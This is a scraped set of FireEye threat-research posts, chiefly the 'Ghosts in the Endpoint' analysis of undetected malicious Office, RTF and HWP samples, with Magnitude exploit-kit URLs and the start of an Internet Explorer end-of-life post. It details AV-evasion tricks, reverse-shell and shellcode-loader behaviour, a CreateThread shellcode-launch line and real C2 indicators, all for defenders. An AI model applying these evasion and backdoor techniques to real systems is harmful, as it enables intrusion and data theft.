Some example Magnitude EK URLs look like this: \n \n6d3bd.439.74331q.436161bv.0ecu.u677n.2401q.p44m.l0sm6dacs2.eventsam.pw/?2d5f484b42434e41444e464c495e03434859 \nmebf65l.c06a2r.ldfbk.zd899fu.w54358p.hf47613b.u90.y99xvzga7k95.satshares.pw/?225047444d4c414e4b41494346510c4c4756 \nl9077e2v.he02528l.obdb52x.34aa9.z144.8d3d49.j0i.w687g98o.hairunits.pw/?2b594e4d444548474248404a4f5805454e5f \n \n\n", "modified": "2015-11-13T13:32:25", "published": "2015-11-13T13:32:25", "id": "FIREEYE:C1FB4B9FAC84D1B9FD74A7D5A588D1D2", "href": "https://www.fireeye.com/blog/threat-research/2015/11/top-ranked_advertisi.html", "type": "fireeye", "title": "Top-ranked Advertising Network Leads to Exploit Kit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2013-1331", "CVE-2015-5119"], "description": "We would like to introduce the first of our \u201cGhosts in the Endpoint\u201d series, a report prepared by FireEye Labs that documents malicious software not being detected in the wild by traditional signature-based detections.\n\nIn this study, all the families identified are samples from VirusTotal (VT) with zero detections, but detected as malicious by our Multi-Vector Virtual Execution (MVX) Engine. We also added a few samples with very low detection rates (VT <=3) but with interesting bypass techniques.\n\nOur goal is to share indicators that help the AV community and others improve their detection coverage.\n\n##### **Scope**\n\n * So far, only samples found in VT with the following file types were included in this study:\n * Win32 binaries\n * Office documents (including Open XML format)\n * RTF documents\n * Hangul Word Processor (HWP)[1] documents\n\nThe study includes samples submitted to VT in 2015 that were still found undetected or with minimal detection rates as of January 2016 (see VT detection Tables in the Appendix). \n\n##### **Findings**\n\nThe following samples were identified in our research:\n\n**Suspected APT malware:**\n\n 1. **GOODTIMES backdoor**: Suspected APT; MS Office with Embedded Hacking Team Flash Exploit\n 2. **UPS backdoor: **Suspected APT3\n 3. **VBA Macro + Metasploit Shellcode Loader:** Suspected Middle Eastern-based APT\n 4. **Hancom Office HWP Exploit:** Possible APT targeting of South Korea.\n\n**Malware without attribution:**\n\n 1. **OccultAgent**: (New) Code hidden in Excel spreadsheet\n 2. **Spy-Net RAT**: Targeting Brazilian victims\n 3. **VBA Macros + PowerShell scripts:** Netcat Backdoor\n 4. **VBA Macros + Python scripts:** Metasploit Shellcode Loader\n 5. **Office Downloader**\n\n##### **Detailed Sample Analysis**\n\nMalware that remains undetected by more than 56 different AV vendors over a long period of time is worth investigating. This section briefly describes the malware and techniques identified in the undetected samples. A full list of indicators can be found in the IOC section at the end.\n\n**1\\. 4b3858c8b35e964a5eb0e291ff69ced6** \\- 201507.xlsx\n\nType: XLSX \nDescription: CVE-2015-5119 (Flash exploit exposed in the Hacking Team leak) \nAttribution: Suspected APT threat group targeting Taiwan \nCurrent detection: 0/53 \nFirst Submission: July 13, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 6 months \n\n\nThis Excel document is PKZIP compressed (following the Open XML Format) with the structure shown in Figure 1:\n\n\n\nFigure 1: Structure of XLSX document\n\nWhen the spreadsheet is opened, a dialog prompts the victim to allow unknown embedded content to be played, as shown in Figure 2. In this case, social engineering is needed to convince the victim to execute the malicious Flash object.\n\n\n\nFigure 2: Excel document content and prompt\n\nWhen the victim allows the embedded content to be played, the activeX1.xml file is read to locate the OLE Control to be used (which corresponds to Macromedia Flash Player, as shown in Figure 3) through the ClassID attribute to finally load the Flash Exploit embedded in the activeX1.bin object.\n\n\n\nFigure 3: Content of activeX1.xml file\n\nThe embedded Flash exploit corresponds to CVE-2015-5119, one of several zero-day exploits identified following the Hacking Team leak in July 2015.[2]\n\nA look at the Flash Action Script (AS) reveals code similar to that from the Hacking Team Exploit, such as the class name exp1_fla/MainTimeLine, the function name TryExpl() with the same use-after-free technique, and even the same error message \u201ccan\u2019t cause UaF\u201d as shown in Figure 4.\n\n\n\nFigure 4: Flash exploit code\n\nThe combination of the class name exp1_fla() and classes ShellMac64, ShellWin32 and ShellWin64 built into the exploit (see Figure 5) were not observed in the original Hacking Team version of the exploit, suggesting that the group responsible for this malicious Excel file modified the original exploit code.\n\n\n\nFigure 5: Flash Action Script classes from malicious Excel file\n\nThe exploit drops a variant of the backdoor we call GOODTIMES (also known as Linopid). The backdoor communicates to Taiwan-based IP addresses 220.128.223.75 and 220.134.47.67 on ports 8080 and 443 via HTTP.\n\nWhile this particular GOODTIMES sample has not been attributed to a specific threat group, GOODTIMES has previously been used by suspected APT actors. Based on previously identified targets and the use of Traditional Chinese language and Taiwan-centric themes in spear phishing messages and decoy documents, the group appears to focus on Taiwanese targets.\n\n##### **Potential AV bypassing reason**\n\n1\\. New delivery mechanism: The leaked CVE-2015-5119 Flash exploit has been used by a wide range of threat groups, including other APT groups such as APT3 and APT18[3]. Previous delivery methods entailed luring the victim to click on a malicious link (delivered via a spear phishing message) where the malicious Flash exploit was hosted on a web page. In this case, the suspected APT group responsible for the GOODTIMES backdoor changed the **delivery mechanism** by embedding the exploit as ActiveX object inside the Excel Open XML Format (PKZIP compressed).\n\n2\\. In addition, while an ActiveX object would normally be embedded inside a Compound File Binary Format[4], in this case the uncompressed Flash content is embedded directly in the Excel file, right after the ClassID, as shown at Figure 6.\n\n\n\nFigure 6: Embedded Flash object\n\n\u00b7 The above steps might be enough to avoid proper parsing of the malicious Flash object. This is the first time we have seen a CVE-2015-5119 sample embedded in an Excel document this way.\n\n**2\\. 22da029dd4e018b7c7135a03d0ba9b99**\n\nType: Win32 binary \nDescription: A variant of the UPS backdoor \nAttribution: suspected APT3 \nCurrent detection: 0/57 \nFirst Submission: August 6, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months\n\nUPS is a backdoor capable of uploading and downloading files, creating a reverse shell, reconfiguring itself to use different command and control (CnC) servers, and acting as a proxy server. It uses a custom binary protocol to communicate with its CnC server and it encrypts this custom protocol using a TLS TCP connection.\n\nWhile this particular UPS sample has not been attributed, UPS is commonly used by the China-based APT3.\n\n**Potential AV bypassing reason**\n\n1\\. Junk code insertion: Examining this UPS sample, we see a significant amount of \u201cjunk code\u201d potentially designed to mask the malicious nature of the binary, as well as to complicate analysis or reverse engineering efforts.\n\nIn Figure 7 we see the backdoor executing a jump to address 0x4043AB by forcing the \u201cjump if greater than\u201d comparison to be true by moving a large value (0x4A2E88E4) to the ebx register and then comparing it with a hardcoded lower value (0x6A1E839), after which a large number of junk instructions are skipped (red square). This strategy can be seen through several different execution paths.\n\n\n\nFigure 7: Decompiled UPS sample showing junk code\n\n**3\\. aedd5d8446cc12ddfdc426cca3ed8bf0 - **S-old.xlsb****\n\nType: XLSB \nDescription: VBA Macro + Metasploit Shellcode Loader Backdoor \nAttribution: Suspected Middle Eastern-based APT \nCurrent detection: 1/52 \nFirst Submission: September 28, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 4 months\n\nThis particular sample, an Excel Binary Workbook file,[5] has only one generic detection on VT, so we believe it is still worth mentioning in this report.\n\nWhen the spreadsheet is opened, the victim is shown a table of Israeli holidays and prompted to enable macros to view the full list, as shown in Figure 8:\n\n\n\nFigure 8: Malicious Excel file showing calendar data\n\nWhen the macro is executed it creates a Windows binary in memory as shown in Figure 9. Note the Chr(77) + Chr(90) builds the MS-DOS header magic number \u201cMZ\u201d.\n\n\n\nFigure 9: Macro concatenating bytes to form a Windows binary\n\nThe binary is written to the file system with the file name NTUSER.dat{**GUID**}.exe as shown in Figure 10.\n\n\n\nFigure 10: Creating the Windows binary\n\nIn this case, the GUID selected corresponds to Scriptlet.TypeLib ActiveX object, creating the file name NTUSER.dat{FB9D87AE-8FEA-4583-98AB-2FB396EAB5FC}.exe (md5 6aab47b18afacbfa7423f09bd1fa6d25) that is later executed via the ShellExecute() API with the SW_HIDE parameter to run silently.\n\nFinally, the executable comes with an embedded Metasploit Shellcode loader that connects to 84.11.146.62 on port TCP 13661.\n\nWhile this sample has not been attributed, similar techniques (use of XLSB files with embedded, obfuscated macros; creation of the file name NTUSER.dat{GUID}.exe; use of the binary to download additional malware) and the same CnC IP address have been referenced in reporting on a suspected Middle Eastern-based APT group known as \u201cRocket Kitten\u201d, primarily targeting Middle Eastern and European organizations.\n\n**_Potential AV bypassing reason_**\n\n1\\. The byte concatenation inside the VBA Macro, used to build a Win32 binary at runtime, helps to bypass signature-based detection.\n\n**4\\. 4e51143b01e99afc3bd908794d81d3cb** \nType: HWP \nDescription: Hancom Office HWP Exploit \nAttribution: None \nCurrent detection: 3/53 \nFirst Submission: July 31, 2015 \nLast Submission: February 2, 2016 \nTime undetected in VT: At least 6 months with 3 generic detections\n\nThis sample, a Hangul Word Processor (HWP) document, has only three generic detections on VT, so we found it to be worth analyzing for this report.\n\nWhen opened, the HWP document displays Korean text and some photographs, as shown in Figure 11. Behind the scenes the document will exploit vulnerable versions of Hancom Office, dropping and executing a malicious file.\n\n\n\nFigure 11: Content of malicious HWP document\n\nInternally, the document structure includes three sections, where section 0 will trigger a Type Confusion vulnerability while parsing the content of the paragraph located at the data record structure HWPTAG_PARA_TEXT starting at offset 0x1C (see uncompressed section 0 at Figure 12). The logic bug will cause the string starting at offset 0x50 to be treated as a control structure. This control structure contains a fake object at offset 0x56 pointing to an address (0x0e0a0e0a) filled by a heap spray that eventually will redirect the execution flow to the shellcode.\n\n\n\nFigure 12: Section0 malformed paragraph\n\nA similar type confusion vulnerability has been previously documented by Ahnlab,[6] however, the vulnerability trigger is different.\n\nSection 2 has an uncompressed size equal to 112MB, used to perform the heap spray and expecting to place the shellcode at a memory address close to 0x0e040e04. In Figure 13, the beginning of the shellcode can be seen (uncompressed).\n\n\n\nFigure 13: Start of shellcode\n\nThe shellcode drops a file on disk and executes it via HncBLXX.HncShellExecute-> SHELL32.ShellExecute. This generates a connection to a compromised Korean automotive website and attempts to retrieve a file with a .JPG extension, which we suspect may be a second-stage binary. However, the file was no longer available on the website at the time of our analysis.\n\nThis particular sample has not been attributed to any threat group. However, the use of malicious HWP documents is notable, as that format is specific to a regional word processing program used heavily in South Korea and in particular by the South Korean government. While the use of malicious HWP files could simply indicate regional targeting by unspecified threat actors, similar exploits have been used in the past by suspected APT groups.\n\n**Potential AV bypassing reason**\n\n1\\. Heap Spray technique change: Similar exploits used to be created with multiple large-size sections in order to spray the heap. This exploit fulfills the same purpose but with only one large-size section.\n\n2\\. Vulnerability triggered in a different format: A similar type confusion vulnerability described in this section was seen implemented in the Open XML Format (HWPX extension)[7], but this time ported to the Compound File Binary Format (HWP extension).\n\n**5\\. 497eddab53c07f4be1dc4a8c169261a5** \\- Barclays_Q22015_IMS_excel_tables.xlsm\n\nType: XLSM \nDescription: **VBA Macro + VBScript generated from spreadsheet** \nAttribution: None \nCurrent detection: 1/54 \nFirst Submission: Julio 08, 2015 \nLast Submission: January 27, 2016 \nTime undetected in VT: At least 7 months\n\nThis sample, an Excel macro-enabled file, has only one generic detection. The embedded macro creates an encoded Visual Basic (VBE) file that connects to a CnC site and allows remote control of the victim\u2019s computer. As we had not previously observed this backdoor, we named it OccultAgent.\n\nWhen the XLSM file is opened, the user is prompted to enable macros, as shown in Figure 14. The instructions are displayed in both English and Greek:\n\n\n\nFigure 14: Prompt to enable macros\n\nThe macro drops an encoded VBScript file named ocagent.vbe (69df0c3bab5e681c2e5eb5951a64776e), obtained from the data in a spreadsheet cell (see Figure 15), to C:\\octemp001\\ and executes it. The script connects to hxxp://0x5E469BFD, which is equivalent to hxxp://94.70.155.253, via the victim\u2019s web browser.\n\n\n\nFigure 15: Obfuscated script embedded in spreadsheet cell\n\nThe first stage Macro source code can be seen in Figure 16.\n\nFigure 16: Embedded VBA macro\n\nThe dropped ocagent.vbe VBScript is essentially a backdoor that connects to the CnC server at 94.70.155.253 to register the victim\u2019s computer and to obtain commands to run on the victim\u2019s machine.\n\n**Potential AV bypassing reason**\n\nThe following steps may be sufficient to bypass AV detection:\n\n1\\. Adding encoded VB script into a spreadsheet cell allows attackers to hide the malicious code.\n\n2\\. Representing the IP address in hexadecimal format may be sufficient to bypass regular expressions trying to match standard 32-bit IP addresses (dotted decimal notation).\n\n**6\\. dc15336e7e4579c9c04c6e4e1f11d3dd - **dedinho no cuzinho.rtf\n\nType: RTF \nDescription: RTF file with embedded executable \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: October 22, 2015 \nLast Submission: January 15, 2016 \nTime undetected in VT: At least 3 months\n\nIn this attack scenario, the victim receives an RTF document that appears to contain an embedded JPG image. The embedded file is actually an executable that attempts to hide its file extension by using a long sequence of underscore characters (e.g., Copy of foto.jpg<underscores>.exe (see Figure 17).\n\nFigure 17: RTF document with embedded file\n\nThe embedded binary (d409dc7e1ca0c86cb71e090591f16146) is packed with RLPack[8]. It drops a second Borland Delphi binary packed with a customized version of UPX, which will then drop the Spy-Net RAT on the system.\n\nSpy-Net[9] allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, run processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. \n\nA beacon to dennyhacker[.]no-ip.org on TCP port 81 prepended with an ASCII representation of the length of the payload (33) and followed by a pipe and a new line character confirms Spy-Net activity:\n\n00000000 33 33 7c 0a 33|.\n\nThe RAT commands are translated to Portuguese to adapt the attack to Brazilian victims; some command examples are shown below (additional commands are listed in the Appendix):\n\nConfiguracoesdoserver = Server settings \nListarjanelas = List windows \nFinalizarconexao = End connection \nListarchaves = List keys\n\n**Potential AV bypassing reason**\n\n1\\. Packers are commonly used to obfuscate code in order to bypass traditional signature-based detection. The use of multiple files packed with two different packers may be sufficient to bypass detection.\n\n**7\\. b1f43ca11dcf9e60f230b9d6d332c479** \u2013 Book2 - Copy.xls\n\nType: XLSX \nDescription: VBA + Python Shellcode loader \nAttribution: None \nCurrent detection: 0/54 \nFirst Submission: September 20, 2015 \nLast Submission: January 28, 2016 \nTime undetected in VT: At least 6 months\n\nWhen opened, this Excel document appears to be blank but contains the VBA macro shown in Figure 18.\n\n\n\nFigure 18: VBA Macro with OLE Object\n\nThe macro will instantiate an OLE Object and load it via the xlVerbPrimary verb. The embedded OLE object contains two files:\n\n * python27.dll (md5 7e6dd0d7cb29103df4a592e364680075) - a legitimate file\n * file.exe (md5 73f16dbf535042bc40e9c663fe01c720) - a binary created with py2exe[10]\n\nOnce file.exe is executed it launches a copy of the Windows calculator (calc.exe) as a decoy. However, behind the scenes it performs a Metasploit reverse TCP Connect to a CnC server.\n\nThe unpacked version of file.exe is obfuscated python that can be seen in Figure 19.\n\n\n\nFigure 19: Python Shellcode\n\nThe following steps describe the process in greater detail:\n\n * File.exe spawns a copy of calc.exe.\n * Base64-decode and AES-decrypt embedded shellcode.\n * Via Python ctypes, the environment is set to run the shellcode loader in memory.\n * The shellcode loader, which has been encoded with the Metasploit Shikata encoder, [11] is configured to connect to the host 31.168.144.18 on port 443.\n * The malware sleeps for 60 seconds and starts again.\n\n**Potential AV bypassing reason** \n\n\nMultiple tricks to evade detection can be seen here:\n\n 1. The file extension of the document is .xls. However, the file is actually an Open XML Format file (.xlsx). This simple trick may bypass extension-based parsers.\n 2. The Embedded OLE object contains a legitimate binary (python27.dll) and a py2exe executable may appear to be a legitimate file.\n 3. The malicious python script is packed using py2exe.\n 4. The Embedded OLE object is extracted from a hidden Sheet3, so the VBA Macro may not appear malicious.\n 5. The shellcode is Base64 encoded and AES encrypted.\n\n**8\\. 95e89fd65a63e8442dcf06d4e768e8f1 **\\- Doc1.docm\n\nType: DOCM \nDescription: VBA + PowerShell + Netcat as Backdoor \nAttribution: None \nCurrent detection: 0/53 \nFirst Submission: June 19, 2015 \nLast Submission: January 26, 2016 \nTime undetected in VT: At least 7 months\n\nThe word document comes with a simple message shown in Figure 20.\n\n\n\nFigure 20: Message distractor\n\nWhen the VBA macro is executed (see Figure 21), PowerShell code is loaded from the document\u2019s comments (see Figure 22):\n\n\n\nFigure 21: Loading malicious code\n\n\n\nFigure 22: Code embedded in the document comments\n\nThe PowerShell script will act as a backdoor to allow remote access to the compromised machine. The script will download and execute netcat to listen on IP 192.168.52.129 and port 3724. Once a connection is received, a PowerShell shell will be sent (via \u2013e powershell.exe option) to the client (PowerShell Reverse shell) as shown in Figure 23.\n\n\n\nFigure 23: Malicious code content\n\nIt is interesting to note that attackers are moving from traditional command prompt shells (cmd.exe) to PowerShell shells (powershell.exe), which are actually more powerful. For example, PowerShell allows the use of WMI (Windows Management Instrumentation), something not readily accessible via the standard command prompt[12].\n\nThe script references a non-routable (RFC1918) IP address, so we suspect that the script was either a proof of concept or meant to be used during the lateral movement phase in a specific internal environment that uses this IP space.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the .docm extension may evade extension-based parsers.\n\n2\\. Embedding the PowerShell script in the document\u2019s comments and executing it from a VB macro adds another layer of complexity. While this is clearly a suspicious behavior, it is not properly identified by signature-based detection.\n\nWe identified several other examples of malware using VBA Macros with PowerShell to mainly run shellcode loaders that allow attackers to gain remote access to victims\u2019 machines. Another example is shown below; it has two VT detections, but serves as an example of a very common variant seen in the wild.\n\n**9\\. 8de1ebacb72f3b23a8235cc66a6b6f68** \u2013 Polnoe_raspisanie_igr.xlsm\n\nType: XLSM \nDescription: VBA Macro + PowerShell \u2013 Shellcode Loader \nAttribution: None \nCurrent detection: 2/54 \nFirst Submission: October 14, 2015 \nLast Submission: January 28, 2016 \nTime undetected: 3.5 months with two generic detections\n\nWhen the Excel document is opened, a message is displayed in Russian. The user is even provided with a link to a legitimate article describing how to enable macros (see Figure 24).\n\nFigure 24: Excel file with legitimate link\n\nWhen the VBA Macro runs, it executes a PowerShell script that Base64-decodes and decompresses a second-stage PowerShell Script that will be used as the shellcode loader in memory (see Figure 25).\n\nFigure 25: PowerShell script being built on the fly via VB script\n\nPowerShell uses the Invoke-Expression (or IEX) call to execute the decompressed string, similar to the eval() functionality from other programming languages.\n\nThe Shellcode in this case comes hardcoded in the second stage PowerShell script, loaded and executed from memory with the following syntax:\n\n$z=$o::CreateThread(0,0,$x,0,0,0); Start-Sleep -Second 100000\n\nWhere $x contains the Shellcode loaded in memory that eventually will connect to the domain spl[.]noip[.]me. Based on DNSDB query, the domain **spl[.]noip[.]me **previously resolved to Russian IP 81.23.177.72.\n\nMost of the VBA Macro + PowerShell scripts we identified were created with the macro_safe.py[13] and unicorn.py[14] scripts, often used for penetration testing.\n\n**Potential AV bypassing reason**\n\n1\\. The .xlsm extension may bypass extension-based parsers\n\n2\\. Using the VBA Macro in the first stage to build the first PowerShell script via concatenation provides an easy way to bypass signature-based detection\n\n3\\. The PowerShell scripts are Base64 encoded and compressed\n\n**10\\. cda305a6a6c6ace02597881b01a116e3 - **CVE-2013-1331-doc.docx\n\nType: DOCX \nDescription: Office Downloader \nAttribution: None \nCurrent detection: 0/55 \nFirst Submission: January 12, 2015 \nLast Submission: January 16, 2016 \nTime undetected in VT: The whole year and counting!\n\nIn 2013, a stack-based buffer overflow triggered while parsing PNG images was exploited in the wild against MS Office 2003 and Office for Mac. CVE-2013-1331 was assigned to the vulnerability.\n\nThe malicious samples did not include the PNG directly embedded in the document; rather, the PNG file was loaded from the Internet by using the INCLUDEPICTURE option[15].\n\nThis new sample uses a different option from the new XML Format called \u201cRelationships\u201d in order to download a resource from the Internet, as seen at Figure 26.\n\n\n\nFigure 26: XML content loading the PNG image remotely\n\nThe same domain was used back in 2013, but now with a different download technique. Although the vulnerability has been patched by Microsoft, the aforementioned technique can be used to download any resource from the Internet.\n\n**Potential AV bypassing reason**\n\n1\\. Use of the XML \u2018Relationship\u2019 instead of the original INCLUDEPICTURE method to download resources from the Internet is a novel technique that may not be recognized.\n\n2\\. Based on the code shown above, it is clear that the intention is not to download a .gif image but a .php resource. Signature-based engines should easily detect the unusual resource name with multiple dots.\n\n##### **Conclusion**\n\nThreat actors of all types continue to improve their techniques to compromise organizations and remain undetected within an environment. Our study identified a number of techniques that successfully bypassed many AV engines:\n\n1\\. Alternate techniques to embed objects within Office documents that may not be recognized by AV engines.\n\n2\\. The use of a multi-stage infection approach in order to look unsuspicious at each stage:\n\na. A document downloading an image from the Internet that cannot be flagged as malicious at that stage \nb. A VBA Macro script loading malicious content from spreadsheet cells\n\n3\\. Multiple techniques to load malicious content from Office documents:\n\na. Embedded as ActiveX \nb. Embedded as OLE Binary \nc. Embedded in the document\u2019s comments \nd. Embedded in the spreadsheet cell\n\n4\\. Standalone packed binaries containing malicious Python scripts.\n\n5\\. Multi-layer Packing: RLPack + Custom UPX.\n\n6\\. The combination of multiple scripting languages to allow the attackers to obfuscate malicious code, such as VBA Script building malicious PowerShell scripts.\n\nIn several cases we note that the attackers are reusing known exploits (such as CVE-2015-5119 or CVE-2013-1331), but changing the delivery method; or leveraging obfuscation, encoding, encryption, or multiple layers of packing to disguise their malicious scripts or backdoors.\n\nFor proper detection, it is essential to monitor an attack through its entire life cycle \u2013 not simply when a suspicious document or file first enters a network. This approach is necessary to detect and block multi-stage infection strategies. While initial events (such as the delivery of a macro-enabled spreadsheet) may appear innocuous, eventually a later stage of the attack will trigger detection.\n\nIt is much easier to stop an attack \u2013 including a multi-stage attack \u2013 when it first occurs, to include detecting known and unknown exploits (zero days), or even threats that require user interaction such as macros inside documents.\n\nThis detection approach is the core logic behind FireEye Multi-Vector Virtual Execution (MVX) technology.\n\n##### **APPENDIX**\n\n**Indicators of Compromise - IOCs**\n\n**Network Based:**\n\n**4b3858c8b35e964a5eb0e291ff69ced6**\n\nPOST /0000/a242550.asp \nIP: 220.128.223.75 \nTCP Port: 8080 \n\n**4e51143b01e99afc3bd908794d81d3cb**\n\nGET /bbs/file/machinery/machine_body.jpg \nIP: cncauto.co.kr \nPORT: 80\n\n**8de1ebacb72f3b23a8235cc66a6b6f68**\n\nIP: spl.noip.me \nTCP Port: 80\n\n**b1f43ca11dcf9e60f230b9d6d332c479**\n\nIP: 31.168.144.18 \nTCP Port: 443\n\n**aedd5d8446cc12ddfdc426cca3ed8bf0**\n\nIP: 84.11.146.62 \nTCP Port: 13661\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nGET /ocagnt/gethooks.asp \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/enckeys \nIP: 94.70.155.253 \nTCP Port: 80 \nGET /ocagnt/getstatus.asp \nIP: 94.70.155.253 \nTCP Port: 80\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd**\n\nIP: dennyhacker.no-ip.org \nTCP Port: 81\n\n**Host-Based:**\n\ndc15336e7e4579c9c04c6e4e1f11d3dd\n\nC:\\Windows\\System32\\install\\server.exe (copy of dropped binary) d409dc7e1ca0c86cb71e090591f16146\n\n%AppData%\\Local\\Temp\\XX--XX--XX.txt\n\nMutex created: \n_x_X_PASSWORDLIST_X_x_ \nx_X_BLOCKMOUSE_X_x_ \n***MUTEX*** \n***MUTEX***_PERSIST\n\n**497eddab53c07f4be1dc4a8c169261a5**\n\nc:\\octemp001\\ \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\ikeycharvalue.txt \nC:\\octemp001\\enchostnameres.txt \nC:\\octemp001\\certutil.txt \nC:\\octemp001\\cert.txt \nC:\\octemp001\\commands.txt \nC:\\octemp001\\prevcommands.txt \nC:\\octemp001\\enccmdresults.txt \nC:\\octemp001\\enccmdresults2.txt \nc:\\octemp001\\key.txt\n\nFigure 27 shows the MD5s with zero detection detailed on this report.\n\n\n\nFigure 27: 2015 samples from VT with zero detections in 2016\n\nSome exceptions to this study were added for samples with low detection rates, but with only generic detection (that is, not detected as part of any specific code family), that used an interesting technique or that were suspected of being used by an APT group (see Figure 28).\n\n\n\nFigure 28: Samples with low and / or generic detection\n\n**dc15336e7e4579c9c04c6e4e1f11d3dd** \u2013 Brazilian RAT\n\nSome interesting commands from the RAT in Portuguese language:\n\n0002A3A8: pingtest \n \n--- \n \n0002A3BC: tentarnovamente \n \n0002A3E0: mouseposition \n \n0002A3F8: keyboardkey \n \n0002A40C: webcaminactive \n \n0002A424: webcamgetbuffer \n \n0002A43C: webcam \n \n0002A44C: desktop \n \n0002A45C: stopsearch \n \n0002A470: listarvalores \n \n0002A488: maininfo \n \n0002A49C: configuracoesdoserver \n \n0002A4BC: disconnect \n \n0002A4D0: uninstall \n \n0002A4E4: renameservidor \n \n0002A4FC: enviarexecnormal \n \n0002A518: enviarexechidden \n \n0002A534: executarcomandos \n \n0002A550: openweb \n \n0002A560: downexec \n \n0002A574: resumetransfer \n \n0002A58C: listardrives \n \n0002A5A4: listararquivos \n \n0002A5BC: execnormal \n \n0002A5D0: execinv \n \n0002A5E0: deletardir \n \n[1] Hangul Word Processor is a word processing application developed by South Korean software firm Hancom. \n[2] http://www.securityweek.com/zero-day-exploits-leaked-hacking-team-breach \n[3] https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html \n[4] https://msdn.microsoft.com/en-us/library/dd942138.aspx \n[5] An XLSB file is stored in binary format instead of the normal XML format, allowing the file to be read from and written to much faster. See https://technet.microsoft.com/en-us/library/dd797428.aspx \n[6] http://asec.ahnlab.com/1035 \n[7] https://www.fireeye.com/content/dam/fireeye-www/global/en/blog/threat-research/FireEye_HWP_ZeroDay.pdf \n[8] http://www.pcworld.com/product/997528/rlpack-basic-edition.html \n[9] https://www.fireeye.com/blog/threat-research/2014/07/the-little-signature-that-could-the-curious-case-of-cz-solution.html \n[10] Py2Exe is a distutils extension to create standalone windows programs from python scripts. See https://sourceforge.net/projects/py2exe/. \n[11] https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/shikata_ga_nai.rb \n[12] http://www.howtogeek.com/163127/how-powershell-differs-from-the-windows-command-prompt/ \n[13] https://github.com/khr0x40sh/MacroShop/blob/master/macro_safe.py \n[14] https://raw.githubusercontent.com/trustedsec/unicorn/master/unicorn.py \n[15] http://blogs.technet.com/b/srd/archive/2013/06/11/ms13-051-get-out-of-my-office.aspx\n", "modified": "2016-04-13T09:00:00", "published": "2016-04-13T09:00:00", "id": "FIREEYE:C106464BCA41AB0D5AF6965D9907C8C3", "href": "https://www.fireeye.com/blog/threat-research/2016/04/ghosts_in_the_endpoi.html", "type": "fireeye", "title": "Ghosts in the Endpoint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "bulletinFamily": "info", "cvelist": ["CVE-2014-0322", "CVE-2015-2502", "CVE-2015-2419", "CVE-2014-1776"], "description": "Microsoft has started the year with an [announcement](<https://www.microsoft.com/en-us/WindowsForBusiness/End-of-IE-support>) that, effective Jan. 12, 2016, support for all older versions of Internet Explorer (IE) will come to an end (known as an EoL, or End of Life). The affected versions are Internet Explorer 7, 8, 9, and 10.\n\nWhat this means for users is that Microsoft will no longer release new security updates for these product versions going forward. This gives users two options: Internet Explorer 11 and Microsoft Edge, the latter of which is currently exclusive to Windows 10. If users would like to keep their browsers up to date, they will need to upgrade to either of these two options.\n\nIt should go without saying that Internet Explorer users are strongly encouraged to update to the latest version. It offers improved security with the latest security features and mitigations. Two notable mitigations introduced to the browser in 2014 are Isolated Heap and Memory Protect, which were implemented on Patch Tuesday of June and July 2014 respectively. Prior to that, Microsoft made a similar announcement about the Windows XP Operating System, wherein they issued an End of Life for XP in April 2014.\n\nThese are all steps in right direction for the Microsoft teams because it allows for the consolidation of team efforts, resulting in a stronger focus on securing fewer versions across a smaller code base. Microsoft continues to silently enhance protections as the months go by while at the same time trimming code.\n\nFigure 1 shows the vulnerability counts for Internet Explorer versions in 2015.\n\n\n\nFigure 1. Internet Explorer vulnerability count for 2015 [1]\n\nThe graph above shows the total number of reported vulnerabilities affecting each version of Internet Explorer across the months of 2015. Keeping in mind that these are non-unique counts, we can observe that, for the most part, the majority of the reported vulnerabilities affected Internet Explorer 11.\n\nFigure 2 shows the most notable in the wild (ITW) attacks exploiting Internet Explorer in 2014 and 2015.\n\nYear\n\n| \n\nCVE\n\n| \n\nAffects \n \n---|---|--- \n \n2014\n\n| \n\n[CVE-2014-0322](<http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html>)\n\n| \n\nIE 9 and 10 \n \n2014\n\n| \n\n[CVE-2014-1776](<http://www.fireeye.com/blog/uncategorized/2014/04/new-zero-day-exploit-targeting-internet-explorer-versions-9-through-11-identified-in-targeted-attacks.html>)\n\n| \n\nIE 6 to 11 \n \n2015\n\n| \n\n[CVE-2015-2419](<https://www.fireeye.com/blog/threat-research/2015/08/cve-2015-2419_inte.html>)\n\n| \n\nIE 10 and 11 \n \n2015\n\n| \n\n[CVE-2015-2502](<http://krebsonsecurity.com/2015/08/microsoft-pushes-emergency-patch-for-ie/>)\n\n| \n\nIE 7 to 11 \n \nFigure 2. ITW attacks of Internet Explorer [1]\n\nThe majority of the attacks found ITW in 2014 and 2015 affected IE 11.\n\nFigure 3 compares the count of vulnerabilities that affect Internet Explorer 11 (IE 11) to the ones that don\u2019t.\n\n\n\nFigure 3. IE11 vs. Non-IE11 vulnerability count [1]\n\nBased on the information found in Figures 1, 2, and 3, most of the vulnerabilities reported in 2015 affected Internet Explorer 11. This shows that attackers, as well as researchers, are focusing considerably on Internet Explorer 11. Microsoft\u2019s most recent move will allow the company to do the same.\n\nIt should be noted that, as of Internet Explorer 11, some features are no longer supported or are considered deprecated. These include, but are not limited to, [VML](<https://msdn.microsoft.com/en-us/library/hh801223\\(v=vs.85\\).aspx>) and [VBScript](<https://msdn.microsoft.com/en-us/library/dn384057\\(v=vs.85\\).aspx>), which have been used to 